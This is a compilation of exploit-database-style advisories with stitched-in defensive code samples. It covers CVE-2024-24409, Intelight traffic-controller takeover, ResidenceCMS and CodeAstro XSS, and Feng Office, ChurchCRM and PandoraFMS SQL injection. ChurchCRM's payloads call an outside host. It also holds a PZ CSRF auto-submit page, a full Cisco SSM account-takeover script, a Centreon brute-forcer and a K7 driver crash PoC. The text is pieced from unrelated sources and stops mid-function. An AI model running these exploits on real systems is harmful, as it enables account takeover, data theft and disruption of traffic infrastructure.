application performs changes with domain admin privileges as designed
so that if we can bypass some restrictions (e.g. format of attribute
value), our requests are applied with domain admin privileges. This
way we can edit the attributes userAccountControl and
msDS-AllowedToDelegateTo.
# Impact
A technician user elevates privileges from Domain User to Domain
Admin. For example, the user can set Constrained Kerberos Delegation
over CLIENT1$ for the CIFS service of the domain controller and access
that CIFS service. As a result, the user was only delegated to manage
CLIENT1$ but can access the CIFS service of the domain controller
while impersonating another user, which was never intended.
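A detection-side illustration of the change described above, added here and not part of the advisory: compare two snapshots of computer objects (as an LDAP export or change audit would produce them) and alert when a computer gains unconstrained delegation, protocol transition, or new msDS-AllowedToDelegateTo targets. The snapshot records, host names and the high-value host list are constructed; the userAccountControl bit values are the standard Active Directory ones.

```python
# Standard userAccountControl bits (Active Directory).
UAC_WORKSTATION_TRUST_ACCOUNT = 0x1000
UAC_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UAC_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition

# Constructed sample: a CIFS SPN on a domain controller is the case the advisory
# walks through, so flag hosts on this list as high severity.
HIGH_VALUE_HOSTS = frozenset({"dc01.corp.example"})

# Constructed directory snapshots keyed by sAMAccountName. CLIENT1$ gains a
# constrained-delegation target; CLIENT2$ gains unconstrained delegation.
SNAPSHOT_BEFORE = {
    "CLIENT1$": {"userAccountControl": UAC_WORKSTATION_TRUST_ACCOUNT,
                 "msDS-AllowedToDelegateTo": []},
    "CLIENT2$": {"userAccountControl": UAC_WORKSTATION_TRUST_ACCOUNT,
                 "msDS-AllowedToDelegateTo": []},
}
SNAPSHOT_AFTER = {
    "CLIENT1$": {"userAccountControl": UAC_WORKSTATION_TRUST_ACCOUNT,
                 "msDS-AllowedToDelegateTo": ["cifs/dc01.corp.example"]},
    "CLIENT2$": {"userAccountControl": UAC_WORKSTATION_TRUST_ACCOUNT | UAC_TRUSTED_FOR_DELEGATION,
                 "msDS-AllowedToDelegateTo": []},
}


def delegation_state(obj: dict) -> dict:
    """Decode the delegation-relevant parts of one computer object."""
    uac = int(obj.get("userAccountControl", 0))
    return {
        "unconstrained": bool(uac & UAC_TRUSTED_FOR_DELEGATION),
        "protocol_transition": bool(uac & UAC_TRUSTED_TO_AUTH_FOR_DELEGATION),
        "constrained_targets": frozenset(obj.get("msDS-AllowedToDelegateTo", [])),
    }


def delegation_changes(before: dict, after: dict, high_value_hosts=HIGH_VALUE_HOSTS) -> list:
    """Return (account, message, severity) tuples for every computer object that
    gained delegation rights between the two snapshots. Any such change made by an
    account that does not hold SeEnableDelegationPrivilege is worth an investigation."""
    alerts = []
    for name, new in after.items():
        old_state = delegation_state(before.get(name, {}))
        new_state = delegation_state(new)
        if new_state["unconstrained"] and not old_state["unconstrained"]:
            alerts.append((name, "unconstrained delegation enabled", "high"))
        if new_state["protocol_transition"] and not old_state["protocol_transition"]:
            alerts.append((name, "protocol transition enabled", "high"))
        added = new_state["constrained_targets"] - old_state["constrained_targets"]
        for spn in sorted(added):
            # SPN form is service/host[:port]; the host decides the severity
            host = spn.split("/", 1)[-1].split(":", 1)[0].lower()
            severity = "high" if host in high_value_hosts else "medium"
            alerts.append((name, f"constrained delegation added to {spn}", severity))
    return alerts


if __name__ == "__main__":
    for account, message, severity in delegation_changes(SNAPSHOT_BEFORE, SNAPSHOT_AFTER):
        print(f"[{severity}] {account}: {message}")
```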
# Proof Of Concept
https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
# Exploit Title: Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 07/09/2024
# Exploit Author: Andrew Lemon/Red Threat https://redthreatsec.com
# Vendor Homepage: https://www.q-free.com
# Software Link: N/A
# Version: 1.9
# Tested on: (Intelight x-1) Linux 3.14.57
# CVE : CVE-2024-38944
## Vulnerability Description
This vulnerability allows remote attackers to bypass authentication on affected installations of MaxTime Database Editor.
Authentication is not required to exploit this vulnerability.
The specific flaw exists within the web-based UI on Traffic Controllers running version 1.9.x firmware.
The issue results from the lack of authentication prior to allowing access to functionality.
An attacker can leverage this vulnerability to gain full control of Intelight Traffic Controllers and modify the configuration of a traffic intersection,
modify traffic light sequences, or trigger the intersection to go into 4 way flash causing a denial of service and causing traffic congestion.
## Steps to Reproduce
1. Navigate to the IP address of an identified controller.
2. When prompted for authentication, append /cgi-bin/generateForm.cgi?formID=142 to the end of the IP address.
3. Under the web security tab, change the drop-down from enabled to disabled and select apply, or take note of the username and password and log in with those.
# Exploit Title: ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)
# Date: 8-7-2024
# Category: Web Application
# Exploit Author: Jeremia Geraldi Sihombing
# Version: 2.10.1
# Tested on: Windows
# CVE: CVE-2024-39143
Description:
----------------
A stored cross-site scripting (XSS) vulnerability exists in
ResidenceCMS 2.10.1 that allows a low-privilege user to create
property content containing arbitrary HTML, which acts as a
stored XSS payload. If this property page is visited by anyone,
including the administrator, the XSS payload is triggered.
Steps to reproduce
-------------------------
1. Log in as a low-privilege user with property edit capability.
2. Create or edit one of the properties owned by the user
(the default property owned by the user can be used).
3. Fill the content form with the XSS payload using the Code View feature.
Before saving, switch back to the usual view to check whether the HTML
is rendered.
Vulnerable parameter name: property[property_description][content]
Example Payload: <img src="x" onerror="alert(document.cookie)">
4. After saving the new property content and clicking 'Finish Editing',
visit the property page and observe that the XSS is triggered.
The XSS can be triggered from any account, or even from an
unauthenticated visitor.
Burp Request
-------------------
POST /en/user/property/7/edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 1111
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/en/user/property/7/edit
Cookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~;
PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=false
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=1
property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished renovated 2-bedroom 2-bathroom flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore Blvd, Tampa, FL 33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg
# Exploit Title: Feng Office 3.11.1.2 - SQL Injection
# Date: 7/2024
# Exploit Author: Andrey Stoykov
# Version: 3.11.1.2
# Tested on: Ubuntu 22.04
# Blog: http://msecureltd.blogspot.com
SQL Injection:
1. Login to application
2. Click on "Workspaces"
3. Copy full URL
4. Paste the HTTP GET request into text file
5. Set the injection point to be in the "dim" parameter value
6. Use SQLMap to automate the process
sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=mysql -p dim --fingerprint
[...]
[12:13:03] [INFO] confirming MySQL
[12:13:04] [INFO] the back-end DBMS is MySQL
[12:13:04] [INFO] actively fingerprinting MySQL
[12:13:05] [INFO] executing MySQL comment injection fingerprint
web application technology: Apache
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.7.37
[...]
# Exploit Title: PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)
# Date: 2024-07-01
# Exploit Author: Vuln Seeker Cybersecurity Team
# Vendor Homepage: https://wordpress.org/plugins/pz-frontend-manager/
# Version: <= 1.0.5
# Tested on: Firefox
# Contact me: vulns@vulnseeker.org
The plugin does not have CSRF checks in some places, which could allow
attackers to make logged in users perform unwanted actions via CSRF attacks.
Proof of concept:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:10003
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1093
Origin: http://localhost:10003
Sec-GPC: 1
Connection: close
Cookie: Cookie
action=pzfm_upload_avatar&imageData=data%3Aimage%2Fpng%3Bbase64%2CiVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx%2FBy7bYvtl4Y8Qn%2BtEjty6WxuQ0KkfOM5wJEeEkT1bsigU%2BxGQV%2BQfZ2ned0LAkLnyQ4XV2XB%2Fk%2BjXdTs8Mc1%2BUlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO%2BqN1sFvJm%2BIScB7s3uo8ZVzC8RrsXjIuqp2n0d%2BsxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0%2B6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5%2FBKh8H%2F3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs%2FEBXgoZ6Jf2KMNMYz4FgBJjTGkxR%2FH67vm%2FH8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle%2FP%2FMPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO%2Byev2NVDtZLeX5rvD9lu0zauxW%2Ba6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF%2BxW%2BYcT47Jkdzi4TpT%2BlPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg%3D%3D&userID=1
CSRF Exploit:
<html>
<body>
<form action="http://localhost:10003/wp-admin/admin-ajax.php"
method="POST">
<input type="hidden" name="action" value="pzfm_upload_avatar" />
<input type="hidden" name="imageData"
value="data:image/png;base64,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"
/>
<input type="hidden" name="userID" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Profile picture of user 1 will be changed in the dashboard
http://localhost:10003/dashboard/?dashboard=profile
Reference:
https://wpscan.com/vulnerability/73ba55a5-6cff-40fc-9686-30c50f060732/
# Exploit Title: ChurchCRM 5.9.1 - SQL Injection
# Author: Sanan Qasimzada
# Date: 06.07.2024
# Vendor: http://churchcrm.io/
# Software: https://github.com/ChurchRM/CRM
# Reference: https://portswigger.net/web-security/sql-injection
# Description:
In manual insertion point 1, the `EID` parameter appears to be
vulnerable to SQL injection attacks.
No cookies and no admin authentication are needed.
An attacker can easily steal information from the system by using
this vulnerability.
STATUS: HIGH Vulnerability - CRITICAL
[+]Payload:
```mysql
---
Parameter: EID (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: EID=(select load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior')) OR NOT 2407=2407
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: EID=(select load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior')) AND (SELECT 9547 FROM (SELECT(SLEEP(3)))QEvX)
Type: UNION query
Title: MySQL UNION query (UTF8) - 11 columns
Payload: EID=(select load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior')) UNION ALL SELECT 'UTF8','UTF8',CONCAT(0x716a6b7a71,0x57646e6842556a56796a75716b504b4d6941786f7578696a4c557449796d76425645505670694b42,0x717a7a7871),'UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8'#
---
```
# Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ChurchCRM/2023/ChurchCRM-4.5.3-121fcc1)
# Proof and Exploit:
[href](https://streamable.com/1eqhw2)
# Time spent:
01:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover
# Google Dork: N/A
# Date: 21/07/2024
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.cisco.com
# Software Link:
https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/smart-software-manager-satellite/datasheet-c78-734539.html
# Version: 8-202206 and earlier
# Tested on: Kali Linux
# CVE : CVE-2024-20419
# Security Advisory:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy
# Technical Analysis: https://www.0xpolar.com/blog/CVE-2024-20419
import requests, sys
from urllib.parse import unquote

# Suppress SSL warnings
requests.packages.urllib3.disable_warnings()

Domain = sys.argv[1]  # Domain, https://0xpolar.com:8443
Username = sys.argv[2]  # Username, by default its [admin]
password = "Polar@123456780"

print("[*] Cisco Smart Software Manager On-Prem")
print("[*] Account Takeover Exploit")
print("[*] Target: "+Domain)
print("[*] Username: "+Username)
print("\n")
print("[*] Getting Necessary Tokens..")

get_url = Domain+"/backend/settings/oauth_adfs?hostname=polar"
response = requests.get(get_url, verify=False)


def get_cookie_value(headers, cookie_name):
    # requests folds several Set-Cookie headers into one comma-separated value
    cookies = headers.get('Set-Cookie', '').split(',')
    for cookie in cookies:
        if cookie_name in cookie:
            parts = cookie.split(';')
            for part in parts:
                if cookie_name in part:
                    # split on the first '=' only: the token value itself may contain '='
                    return part.split('=', 1)[1].strip()
    return None


set_cookie_headers = response.headers.get('Set-Cookie', '')
xsrf_token = get_cookie_value(response.headers, 'XSRF-TOKEN')
lic_engine_session = get_cookie_value(response.headers, '_lic_engine_session')
if xsrf_token:
    xsrf_token = unquote(xsrf_token)

if not lic_engine_session or not xsrf_token:
    print("Required cookies not found in the response.")
else:
    print("[+] lic_engine_session: "+lic_engine_session)
    print("[+] xsrf_token: "+xsrf_token)
    print("\n[*] Generating Auth Token")
    post_url = Domain+"/backend/reset_password/generate_code"
    headers = {
        'Accept': 'application/json',
        'Content-Type': 'application/json',
        'X-Xsrf-Token': xsrf_token,
        'Sec-Ch-Ua': '',
        'Sec-Ch-Ua-Mobile': '?0',
    }
    cookies = {
        '_lic_engine_session': lic_engine_session,
        'XSRF-TOKEN': xsrf_token,
    }
    payload = {
        'uid': Username
    }
    post_response = requests.post(post_url, headers=headers, cookies=cookies, json=payload, verify=False)
    post_response_json = post_response.json()
    auth_token = post_response_json.get('auth_token')
    if not auth_token:
        print("auth_token not found in the response.")
    else:
        print("[+] Auth Token: "+auth_token)
        print("\n[*] Setting Up a New Password")
        final_post_url = Domain+"/backend/reset_password"
        final_headers = {
            'Accept': 'application/json',
            'Content-Type': 'application/json',
            'X-Xsrf-Token': xsrf_token,
        }
        final_cookies = {
            '_lic_engine_session': lic_engine_session,
            'XSRF-TOKEN': xsrf_token,
        }
        final_payload = {
            'uid': Username,
            'auth_token': auth_token,
            'password': password,
            'password_confirmation': password,
            'common_name': ''
        }
        final_post_response = requests.post(final_post_url, headers=final_headers, cookies=final_cookies, json=final_payload, verify=False)
        response_text = final_post_response.text
        if "OK" in response_text:
            print("[+] Password Successfully Changed!")
            print("[+] Username: "+Username)
            print("[+] New Password: "+password)
        else:
            print("[!] Something Went Wrong")
            print(response_text)
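The exploit works because generate_code hands the reset token back to whoever asked for it. The hardened flow below is an added example, not Cisco's code: the token is delivered only out of band (a hypothetical mailer callback), stored hashed with an expiry, compared in constant time and consumed on first use, and the generate_code response carries no token and looks the same for unknown accounts.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60


def hash_password(password, salt=None):
    """Salted PBKDF2 for the stored credential; returns salt + digest."""
    salt = salt or secrets.token_bytes(16)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


class PasswordResetService:
    """Hypothetical server-side reset flow (added example, not the product's)."""

    def __init__(self, users, send_reset_mail, clock=time.time):
        self.users = users                      # uid -> {"email": ..., "password": ...}
        self.send_reset_mail = send_reset_mail  # out-of-band delivery callback
        self.clock = clock                      # injectable for expiry tests
        self.pending = {}                       # uid -> (sha256(token), expires_at)

    @staticmethod
    def _token_hash(token):
        return hashlib.sha256(token.encode()).hexdigest()

    def generate_code(self, uid):
        """Counterpart of /backend/reset_password/generate_code: the token never
        appears in the response, and unknown uids get the identical reply."""
        if uid in self.users:
            token = secrets.token_urlsafe(32)
            self.pending[uid] = (self._token_hash(token), self.clock() + TOKEN_TTL_SECONDS)
            self.send_reset_mail(self.users[uid]["email"], token)
        return {"status": "OK"}

    def reset_password(self, uid, token, password, password_confirmation):
        """Counterpart of /backend/reset_password: only a fresh, unexpired,
        single-use token that matches the stored hash changes the password."""
        entry = self.pending.get(uid)
        if entry is None or password != password_confirmation:
            return False
        token_hash, expires_at = entry
        if self.clock() > expires_at:
            del self.pending[uid]
            return False
        if not hmac.compare_digest(token_hash, self._token_hash(token)):
            return False
        del self.pending[uid]  # single use
        self.users[uid]["password"] = hash_password(password)
        return True


if __name__ == "__main__":
    outbox = []  # stands in for the mail system
    svc = PasswordResetService({"admin": {"email": "admin@example.test"}},
                               lambda to, tok: outbox.append((to, tok)))
    print(svc.generate_code("admin"))                      # {'status': 'OK'}, no auth_token
    _, mailed_token = outbox[0]
    print(svc.reset_password("admin", "guess", "Pw1", "Pw1"))        # False
    print(svc.reset_password("admin", mailed_token, "Pw1", "Pw1"))   # True
    print(svc.reset_password("admin", mailed_token, "Pw2", "Pw2"))   # False, token consumed
```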
# Exploit Title : Centron 19.04 - Remote Code Execution (RCE)
# Tested on Centreon API 19.04.0
# Centreon 19.04 - Login Password Bruteforcer
# Written on 6 Nov 2019
# Referencing API Authentication of the Centreon API document
# Author: st4rry
# centbruteon.py
# Centreon Download Link: https://download.centreon.com/#version-Older
# Dependencies: sys, requests, argparse, termcolor, os
#!/usr/bin/env python3
import sys
import requests
import argparse
from termcolor import colored
import os


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', dest='host', help='Define your target URL', required=True)
    parser.add_argument('-p', dest='port', type=int, help='Specify port number', default=80)
    parser.add_argument('--https', dest='https', action='store_true', help='Use HTTPS instead of HTTP')
    parser.add_argument('-l', dest='username', help='Specific username')
    parser.add_argument('-L', dest='userfile', type=argparse.FileType('r'), help='Username wordlist')
    parser.add_argument('-w', dest='passwfile', type=argparse.FileType('r'), help='Specify Password wordlist', required=True)
    parser.add_argument('--insecure', action='store_true', help='Skip SSL certificate verification')
    parser.add_argument('--ca-bundle', dest='ca_bundle', help='Path to custom CA bundle')
    if len(sys.argv) == 1:
        parser.print_help(sys.stderr)
        sys.exit(1)
    args = parser.parse_args()
    protocol = 'https' if args.https else 'http'
    server = f"{protocol}://{args.host}:{args.port}"
    user = args.username
    passfile = args.passwfile.read().splitlines()
    userfile = args.userfile
    dirlo = '/centreon/api/index.php?action=authenticate'
    verify_ssl = not args.insecure
    if args.ca_bundle:
        verify_ssl = args.ca_bundle
    if user:
        brute_force_single_user(server, user, passfile, dirlo, verify_ssl)
    elif userfile:
        usrwl = userfile.read().splitlines()
        brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl)
    else:
        print(colored('Something went wrong!', 'red'))
        sys.exit(1)


def brute_force_single_user(server, user, passfile, dirlo, verify_ssl):
    for password in passfile:
        data = {'username': user, 'password': password}
        r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl)
        try:
            print('Processing...')
            print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') +
                  colored(' Username: ', 'yellow') + colored(user, 'yellow') +
                  colored(' Password: ', 'yellow') + colored(password, 'yellow'))
            if r.status_code == 200:
                print(colored('Credentials found: username: ', 'green') + colored(user, 'green') +
                      colored(' password: ', 'green') + colored(password, 'green') +
                      colored(' server: ', 'green') + colored(server, 'green'))
                print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan'))
                print('\n')
                break
            else:
                print(colored('403 - Unauthenticated!', 'red'))
        except IndexError:
            print(colored('Something went wrong', 'red'))


def brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl):
    for usr in usrwl:
        for password in passfile:
            data = {'username': usr, 'password': password}
            r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl)
            try:
                print('Processing...')
                print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') +
                      colored(' Username: ', 'yellow') + colored(usr, 'yellow') +
                      colored(' Password: ', 'yellow') + colored(password, 'yellow'))
                if r.status_code == 200:
                    print(colored('Credentials found: username: ', 'green') + colored(usr, 'green') +
                          colored(' password: ', 'green') + colored(password, 'green') +
                          colored(' server: ', 'green') + colored(server, 'green'))
                    print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan'))
                    print('\n')
                else:
                    print(colored('403 - Unauthenticated!', 'red'))
            except IndexError:
                print(colored('Something went wrong', 'red'))


if __name__ == '__main__':
    main()
# Exploit Title: K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)
# Date: 13.08.2024
# Author: M. Akil Gündoğan
# Vendor Homepage: https://k7computing.com/
# Version: < v17.0.2019
# Tested on: Windows 10 Pro x64
# CVE ID: CVE-2024-36424
# Vulnerability Description:
--------------------------------------
In K7 Ultimate Security < v17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of a null pointer dereference reachable through IOCTL 0x222010 and 0x222014. At the same time, the driver's device is accessible to all users in the "Everyone" group.
# Technical details and step-by-step Proof of Concept (PoC):
--------------------------------------
1 - Install the driver in the path "C:\Program Files (x86)\K7 Computing\K7TSecurity\K7TSecurity\64Bit\K7RKScan.sys" to the system via OSRLoader or sc create.
2 - Compile the attached PoC code written in C++ as release on VS 2022.
3 - Run the compiled PoC directly with a double click. You will see the system crash/BSOD.
# Impact:
--------------------------------------
An attacker with unauthorized user access can cause the entire system to crash and terminate critical processes, including any antivirus process where the relevant driver is activated and used on the system.
# Advisories:
--------------------------------------
K7 Computing recommends that all customers update their products to the corresponding versions shown below:
K7 Ultimate Security (17.0.2019 or Higher)
# Timeline:
--------------------------------------
- 16.05.2024 - Vulnerability reported.
- 05.08.2024 - Vendor has fixed the vulnerability.
- 13.08.2024 - Released.
# References:
--------------------------------------
- Vendor: https://www.k7computing.com
- Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417
- CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424
- Repository: https://github.com/secunnix/CVE-2024-36424
# PoC Code (C++):
-------------------------------------------------------------------------------------------------------------------------
/*
# Usage: Only compile it and run, boooom :)
*/
#include <windows.h>
#include <iostream>

const std::wstring driverDevice = L"\\\\.\\DosK7RKScnDrv"; // K7RKScan.sys symbolic link path
const DWORD ioCTL = 0x222010; // IOCTL 0x222010 or 0x222014

int main() {
    std::cout << "K7 Ultimate Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC" << std::endl;

    // The device is opened with an "Everyone" ACL, so no elevation is needed
    HANDLE hDevice = CreateFile(driverDevice.c_str(),
                                GENERIC_READ | GENERIC_WRITE,
                                0,
                                nullptr,
                                OPEN_EXISTING,
                                0,
                                nullptr);
    if (hDevice == INVALID_HANDLE_VALUE) {
        std::cerr << "Failed, please load driver and check again. Exit... " << GetLastError() << std::endl;
        return 1;
    }

    void* inputBuffer = nullptr; // Null input buffer
    DWORD inputBufferSize = 0;
    DWORD bytesReturned;

    // The driver dereferences the (null) input buffer for this IOCTL
    BOOL result = DeviceIoControl(hDevice,
                                  ioCTL,
                                  inputBuffer,
                                  inputBufferSize,
                                  nullptr,
                                  0,
                                  &bytesReturned,
                                  nullptr);
    if (!result) {
        std::cerr << "DeviceIoControl failed. Exit... " << GetLastError() << std::endl;
    }

    CloseHandle(hDevice);
    return 0;
}
# Exploit Title: CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS)
# Date: 2024-08-15
# Exploit Author: Raj Nandi
# Vendor Homepage: https://codeastro.com/
# Software Link:
https://codeastro.com/online-railway-reservation-system-in-php-with-source-code/
# Version: 1.0
# Tested on: Any OS
# CVE: CVE-2024-7815
## Description:
A Cross-Site Scripting (XSS) vulnerability exists in CodeAstro Online
Railway Reservation System 1.0. This vulnerability allows an attacker to inject and execute
arbitrary JavaScript code within the context of the user's browser session.
## Proof of Concept (PoC):
1. Navigate to [vulnerable page or input field].
2. Input the following payload: `<script>alert(document.cookie)</script>`
3. Upon execution, the script will trigger and display the user's cookies
in an alert box.
## Mitigation:
To prevent this vulnerability, ensure that all user inputs are properly
sanitized and validated before being reflected back on the webpage.
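The mitigation above, and the ResidenceCMS case earlier where the property description legitimately accepts HTML, call for two different controls: plain-text fields get encoded on output, while rich-text fields get an allowlist sanitizer that strips scripts, event-handler attributes and script-bearing URLs. This is an added example built on the standard library, not code from either project; the tag and attribute allowlist is an assumption chosen for a property description.

```python
import html
from html.parser import HTMLParser

# Allowlist for rich-text fields (assumed for a property description).
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "ul", "ol", "li",
                "a", "img", "h1", "h2", "h3"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}
DROPPED_WITH_CONTENT = {"script", "style"}   # tag and body both removed


def is_safe_url(value):
    """Accept http(s), relative and fragment URLs; reject javascript:, data:
    and any other scheme that could execute in an href or src."""
    v = (value or "").strip().lower()
    if v.startswith(("http://", "https://", "/", "#")):
        return True
    return ":" not in v  # scheme-less relative reference such as "x"


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []   # allowed non-void tags still open, for balancing
        self.skip_depth = 0   # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROPPED_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag: drop the tag, keep its text content
        safe_attrs = []
        for name, value in attrs:
            if name.startswith("on"):            # onerror, onload, onclick, ...
                continue
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in ("href", "src") and not is_safe_url(value):
                continue
            safe_attrs.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(safe_attrs)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROPPED_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open_tags:
            return
        while self.open_tags:  # close anything still open inside this tag
            closed = self.open_tags.pop()
            self.out.append(f"</{closed}>")
            if closed == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))

    def result(self):
        while self.open_tags:  # balance tags left open by the input
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_html(fragment):
    """For fields that must allow HTML: keep allowlisted markup only."""
    p = AllowlistSanitizer()
    p.feed(fragment)
    p.close()
    return p.result()


def escape_for_html(text):
    """For plain-text fields: encode everything when rendering into HTML."""
    return html.escape(text, quote=True)


if __name__ == "__main__":
    print(sanitize_html('<img src="x" onerror="alert(document.cookie)">'))   # <img src="x">
    print(escape_for_html('<script>alert(document.cookie)</script>'))
```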
# Exploit Title: PandoraFMS 7.0NG.772 - SQL Injection
# Date: 21/11/2023
# Exploit Author: Osama Yousef
# Vendor Homepage: https://pandorafms.com/
# Software Link: https://github.com/pandorafms/pandorafms/releases/download/v772-LTS/pandorafms_agent_linux-7.0NG.772.tar.gz
# Version: v7.0NG.772
# Tested on: Linux
# CVE : CVE-2023-44088
import re, requests, argparse, string, random, base64
import urllib3
import html

headers = {
    'Cache-Control': 'max-age=0',
    'Origin': '',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36',
    'Accept': '*/*',
    'Referer': ''
}


def login(session, url, username, password):
